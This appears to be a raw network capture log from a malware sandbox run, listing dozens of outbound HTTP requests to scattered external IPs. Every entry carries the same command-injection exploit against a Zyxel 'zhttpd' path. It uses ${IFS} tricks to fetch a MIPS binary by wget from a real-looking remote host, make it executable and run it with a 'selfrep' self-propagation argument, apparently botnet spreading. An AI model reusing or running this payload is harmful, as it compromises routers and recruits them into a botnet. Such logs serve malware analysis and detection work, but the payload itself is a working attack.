                                                Jan 28, 2024 10:16:27.845175982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4899192.168.2.23510802.185.167.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845208883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4900192.168.2.2356652130.3.122.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845244884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4901192.168.2.2346940201.232.113.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845266104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4902192.168.2.2338728114.101.144.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845298052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4903192.168.2.2345404118.194.16.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845350027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4904192.168.2.2345052169.208.163.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845375061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4905192.168.2.2338534115.235.145.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845400095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4906192.168.2.234416662.122.90.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845432043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4907192.168.2.2333518145.25.156.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845444918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4908192.168.2.2348582200.68.222.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845469952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4909192.168.2.2357506196.67.82.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845491886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4910192.168.2.2335708162.57.71.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845551968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4911192.168.2.2337346165.31.64.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845586061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4912192.168.2.235689049.233.135.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845606089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4913192.168.2.2337078190.241.43.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845648050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4914192.168.2.2352914103.239.200.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845698118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4915192.168.2.2345800150.76.159.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845720053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4916192.168.2.234663660.242.51.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845760107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4917192.168.2.2339488153.127.102.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845778942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4918192.168.2.2339474128.120.6.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845791101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4919192.168.2.2339898168.238.140.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845813990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4920192.168.2.23508389.12.140.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845884085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4921192.168.2.23547681.5.207.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845910072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4922192.168.2.2345438132.157.250.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845912933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4923192.168.2.2352620195.187.166.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845962048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4924192.168.2.234611686.91.247.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845972061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4925192.168.2.234551068.111.86.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846012115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4926192.168.2.235910419.187.192.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846049070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4927192.168.2.2336992153.111.243.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846075058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4928192.168.2.235421280.117.53.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846079111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4929192.168.2.233789454.191.23.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846132994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4930192.168.2.235146634.199.75.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846151114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4931192.168.2.2344346189.47.67.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846179962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4932192.168.2.2341832130.235.162.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846208096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4933192.168.2.235485018.152.206.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846237898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4934192.168.2.2349202188.100.108.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846256971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4935192.168.2.233363682.62.204.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846277952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4936192.168.2.234586896.213.219.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846316099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4937192.168.2.2348488112.48.118.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846335888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4938192.168.2.233601287.78.128.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846366882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4939192.168.2.2340408130.250.167.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846390009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4940192.168.2.235900846.114.28.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846426964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4941192.168.2.235078664.25.90.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846448898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4942192.168.2.234441686.219.172.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846470118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4943192.168.2.2354366206.199.140.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846508026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4944192.168.2.2343824111.123.42.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846538067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4945192.168.2.234607034.39.207.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846586943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4946192.168.2.2356450106.132.101.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846606970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4947192.168.2.235978051.248.57.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846657991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4948192.168.2.235856840.209.105.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846672058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4949192.168.2.2342964221.157.90.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846712112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4950192.168.2.233727635.98.76.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846748114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4951192.168.2.2351970126.253.190.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846767902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4952192.168.2.2350074123.181.211.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846786022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4953192.168.2.2357572208.121.100.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846807003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4954192.168.2.234949298.247.134.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846847057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4955192.168.2.2336776196.76.21.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846882105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4956192.168.2.235426432.242.35.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846913099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4957192.168.2.2359240203.11.113.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846960068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4958192.168.2.233479683.130.120.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.846966982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4959192.168.2.234925097.43.186.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847033024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4960192.168.2.2344060208.46.129.228443
                                                TimestampBytes transferredDirectionData
